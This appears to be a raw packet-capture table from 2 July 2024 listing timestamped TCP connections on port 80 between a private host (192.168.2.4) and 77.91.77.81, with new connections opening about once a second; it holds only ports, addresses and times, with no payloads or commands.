Jul 2, 2024 00:26:27.236593962 CEST	80	49816	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:27.926383972 CEST	80	49816	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:27.926457882 CEST	49816	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:28.655529022 CEST	49816	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:28.655967951 CEST	49817	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:28.662012100 CEST	80	49816	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:28.662069082 CEST	49816	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:28.662297964 CEST	80	49817	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:28.662357092 CEST	49817	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:28.724673986 CEST	49817	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:28.732263088 CEST	80	49817	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:29.373922110 CEST	80	49817	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:29.373985052 CEST	49817	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:29.477902889 CEST	49817	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:29.478247881 CEST	49818	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:29.482937098 CEST	80	49817	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:29.482983112 CEST	49817	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:29.482999086 CEST	80	49818	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:29.483059883 CEST	49818	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:29.483282089 CEST	49818	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:29.487977028 CEST	80	49818	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:30.191370010 CEST	80	49818	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:30.191437960 CEST	49818	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:30.195328951 CEST	49818	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:30.195723057 CEST	49819	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:30.200404882 CEST	80	49818	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:30.200448036 CEST	49818	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:30.200766087 CEST	80	49819	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:30.200829983 CEST	49819	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:30.201194048 CEST	49819	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:30.205960035 CEST	80	49819	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:30.889023066 CEST	80	49819	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:30.889111042 CEST	49819	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:30.996176958 CEST	49819	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:30.996537924 CEST	49820	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:31.001277924 CEST	80	49819	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:31.001415968 CEST	49819	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:31.001424074 CEST	80	49820	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:31.001537085 CEST	49820	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:31.001980066 CEST	49820	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:31.007345915 CEST	80	49820	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:31.711632013 CEST	80	49820	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:31.713493109 CEST	49820	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:32.699245930 CEST	49820	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:32.699655056 CEST	49821	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:32.704493999 CEST	80	49821	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:32.704510927 CEST	80	49820	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:32.704565048 CEST	49821	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:32.704593897 CEST	49820	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:32.704966068 CEST	49821	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:32.709821939 CEST	80	49821	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:33.405571938 CEST	80	49821	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:33.405653000 CEST	49821	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:33.525298119 CEST	49821	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:33.525752068 CEST	49822	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:33.530935049 CEST	80	49821	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:33.531099081 CEST	49821	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:33.531541109 CEST	80	49822	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:33.531646013 CEST	49822	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:33.532319069 CEST	49822	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:33.538697958 CEST	80	49822	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:34.239108086 CEST	80	49822	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:34.239165068 CEST	49822	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:34.243017912 CEST	49822	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:34.243364096 CEST	49823	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:34.248277903 CEST	80	49822	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:34.248326063 CEST	49822	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:34.248671055 CEST	80	49823	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:34.248739958 CEST	49823	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:34.249169111 CEST	49823	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:34.256552935 CEST	80	49823	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:34.959758043 CEST	80	49823	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:34.962661028 CEST	49823	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:35.073220968 CEST	49823	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:35.073601007 CEST	49824	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:35.078403950 CEST	80	49823	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:35.078486919 CEST	49823	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:35.078942060 CEST	80	49824	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:35.079025984 CEST	49824	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:35.079485893 CEST	49824	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:35.084435940 CEST	80	49824	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:35.796919107 CEST	80	49824	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:35.796983004 CEST	49824	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:35.801881075 CEST	49824	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:35.802215099 CEST	49825	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:35.808465004 CEST	80	49824	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:35.810625076 CEST	49824	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:35.812731028 CEST	80	49825	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:35.814610958 CEST	49825	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:35.814887047 CEST	49825	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:35.821342945 CEST	80	49825	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:36.541913986 CEST	80	49825	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:36.542030096 CEST	49825	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:36.649373055 CEST	49825	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:36.649748087 CEST	49826	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:36.654598951 CEST	80	49826	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:36.654661894 CEST	80	49825	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:36.654737949 CEST	49825	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:36.654752970 CEST	49826	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:36.655046940 CEST	49826	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:36.659879923 CEST	80	49826	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:37.358474016 CEST	80	49826	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:37.358530045 CEST	49826	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:37.361334085 CEST	49826	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:37.361794949 CEST	49827	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:37.367582083 CEST	80	49827	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:37.367593050 CEST	80	49826	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:37.367669106 CEST	49827	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:37.367681980 CEST	49826	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:37.368011951 CEST	49827	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:37.373881102 CEST	80	49827	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:38.077682972 CEST	80	49827	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:38.077758074 CEST	49827	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:38.196063042 CEST	49827	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:38.196355104 CEST	49828	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:38.202994108 CEST	80	49827	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:38.203007936 CEST	80	49828	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:38.203109026 CEST	49827	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:38.203119993 CEST	49828	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:38.203366995 CEST	49828	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:38.209662914 CEST	80	49828	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:38.901175022 CEST	80	49828	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:38.901230097 CEST	49828	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:38.916769028 CEST	49828	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:38.917681932 CEST	49829	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:38.924278975 CEST	80	49828	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:38.924348116 CEST	49828	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:38.925230026 CEST	80	49829	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:38.925478935 CEST	49829	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:38.926104069 CEST	49829	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:38.934379101 CEST	80	49829	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:39.626408100 CEST	80	49829	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:39.626554966 CEST	49829	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:40.285711050 CEST	49829	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:40.289411068 CEST	49830	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:40.292227983 CEST	80	49829	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:40.292293072 CEST	49829	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:40.295178890 CEST	80	49830	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:40.295283079 CEST	49830	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:40.295648098 CEST	49830	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:40.302395105 CEST	80	49830	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:41.007854939 CEST	80	49830	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:41.007941961 CEST	49830	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.010917902 CEST	49830	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.011275053 CEST	49831	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.018030882 CEST	80	49830	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:41.018115044 CEST	49830	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.018239021 CEST	80	49831	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:41.018301964 CEST	49831	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.018426895 CEST	49831	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.025435925 CEST	80	49831	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:41.732228994 CEST	80	49831	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:41.732281923 CEST	49831	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.837343931 CEST	49831	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.837657928 CEST	49832	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.842683077 CEST	80	49831	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:41.842699051 CEST	80	49832	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:41.842741966 CEST	49831	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.842767954 CEST	49832	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.843025923 CEST	49832	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.847951889 CEST	80	49832	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:41.850111961 CEST	49832	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.854058981 CEST	49833	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.858983040 CEST	80	49833	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:41.859128952 CEST	49833	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.859435081 CEST	49833	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:41.864193916 CEST	80	49833	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:42.566591978 CEST	80	49833	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:42.570732117 CEST	49833	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:43.039278984 CEST	49833	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:43.044631958 CEST	80	49833	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:43.044826031 CEST	49833	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:43.116341114 CEST	49834	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:43.121237040 CEST	80	49834	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:43.121474028 CEST	49834	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:43.147583008 CEST	49834	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:43.152406931 CEST	80	49834	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:43.835758924 CEST	80	49834	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:43.835814953 CEST	49834	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:43.848664999 CEST	49834	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:43.849308014 CEST	49835	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:43.854167938 CEST	80	49834	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:43.854182005 CEST	80	49835	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:43.854203939 CEST	49834	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:43.854244947 CEST	49835	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:43.886790991 CEST	49835	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:43.891576052 CEST	80	49835	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:44.560575962 CEST	80	49835	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:44.560640097 CEST	49835	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:44.664881945 CEST	49835	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:44.665288925 CEST	49836	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:44.670095921 CEST	80	49835	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:44.670157909 CEST	49835	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:44.670444965 CEST	80	49836	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:44.670557022 CEST	49836	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:44.670752048 CEST	49836	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:44.675468922 CEST	80	49836	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:45.380455971 CEST	80	49836	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:45.380537033 CEST	49836	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:45.383538008 CEST	49836	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:45.383892059 CEST	49837	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:45.388706923 CEST	80	49836	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:45.388772011 CEST	49836	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:45.389246941 CEST	80	49837	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:45.393394947 CEST	49837	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:45.393712044 CEST	49837	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:45.398472071 CEST	80	49837	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:46.084444046 CEST	80	49837	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:46.084517002 CEST	49837	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:46.205982924 CEST	49837	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:46.207438946 CEST	49838	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:46.213052988 CEST	80	49837	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:46.213099957 CEST	49837	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:46.213805914 CEST	80	49838	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:46.213881016 CEST	49838	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:46.214929104 CEST	49838	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:46.221237898 CEST	80	49838	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:46.903192043 CEST	80	49838	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:46.904694080 CEST	49838	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:47.318849087 CEST	49838	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:47.319828033 CEST	49839	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:47.324191093 CEST	80	49838	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:47.324235916 CEST	49838	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:47.324588060 CEST	80	49839	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:47.324708939 CEST	49839	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:47.327984095 CEST	49839	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:47.332752943 CEST	80	49839	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:48.034367085 CEST	80	49839	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:48.034441948 CEST	49839	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:48.150089025 CEST	49839	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:48.150480032 CEST	49840	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:48.155430079 CEST	80	49839	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:48.155451059 CEST	80	49840	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:48.155482054 CEST	49839	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:48.155565023 CEST	49840	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:48.155848026 CEST	49840	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:48.160947084 CEST	80	49840	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:48.849637985 CEST	80	49840	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:48.849899054 CEST	49840	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:48.857917070 CEST	49840	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:48.858258009 CEST	49841	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:48.866055012 CEST	80	49840	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:48.866075993 CEST	80	49841	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:48.866137028 CEST	49840	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:48.866199970 CEST	49841	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:48.866648912 CEST	49841	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:48.873560905 CEST	80	49841	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:49.575920105 CEST	80	49841	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:49.577107906 CEST	49841	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:49.848545074 CEST	49841	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:49.854721069 CEST	80	49841	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:49.854820967 CEST	49841	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:49.860569954 CEST	49842	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:49.866466999 CEST	80	49842	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:49.866542101 CEST	49842	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:49.918056011 CEST	49842	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:49.922954082 CEST	80	49842	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:50.593754053 CEST	80	49842	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:50.593837976 CEST	49842	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:51.002363920 CEST	49842	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:51.008572102 CEST	80	49842	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:51.225699902 CEST	80	49842	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:51.225774050 CEST	49842	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:51.342883110 CEST	49842	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:51.343302965 CEST	49843	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:51.350743055 CEST	80	49843	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:51.350822926 CEST	49843	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:51.351099014 CEST	49843	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:51.351563931 CEST	80	49842	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:51.351613998 CEST	49842	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:51.358221054 CEST	80	49843	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:52.073173046 CEST	80	49843	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:52.073555946 CEST	49843	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.076598883 CEST	49843	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.076915026 CEST	49844	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.085316896 CEST	80	49843	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:52.085371017 CEST	49843	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.085506916 CEST	80	49844	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:52.085596085 CEST	49844	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.196285009 CEST	49845	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.203284979 CEST	80	49845	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:52.206671953 CEST	49845	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.206867933 CEST	49845	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.213370085 CEST	80	49845	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:52.912319899 CEST	80	49845	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:52.914680004 CEST	49845	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.917759895 CEST	49845	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.917870045 CEST	49846	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.925090075 CEST	80	49846	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:52.925342083 CEST	80	49845	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:52.925437927 CEST	49845	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.925457954 CEST	49846	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.925648928 CEST	49846	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:52.932521105 CEST	80	49846	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:53.633696079 CEST	80	49846	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:53.633785009 CEST	49846	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:53.743539095 CEST	49846	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:53.743851900 CEST	49847	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:53.750855923 CEST	80	49846	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:53.750883102 CEST	80	49847	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:53.750955105 CEST	49846	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:53.751008987 CEST	49847	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:53.751408100 CEST	49847	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:53.758263111 CEST	80	49847	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:54.469104052 CEST	80	49847	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:54.470845938 CEST	49847	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:54.473664045 CEST	49847	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:54.473985910 CEST	49848	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:54.481136084 CEST	80	49848	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:54.481164932 CEST	80	49847	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:54.481265068 CEST	49847	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:54.481302023 CEST	49848	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:54.481518984 CEST	49848	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:54.488149881 CEST	80	49848	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:55.194427967 CEST	80	49848	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:55.194504976 CEST	49848	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:55.305685043 CEST	49848	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:55.306058884 CEST	49849	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:55.313493013 CEST	80	49848	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:55.313719034 CEST	80	49849	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:55.313821077 CEST	49848	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:55.313873053 CEST	49849	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:55.314095020 CEST	49849	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:55.321718931 CEST	80	49849	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:56.034920931 CEST	80	49849	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:56.034996033 CEST	49849	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:56.038659096 CEST	49849	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:56.039077044 CEST	49850	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:56.046323061 CEST	80	49849	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:56.046415091 CEST	49849	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:56.046438932 CEST	80	49850	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:56.046639919 CEST	49850	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:56.046886921 CEST	49850	80	192.168.2.4	77.91.77.81
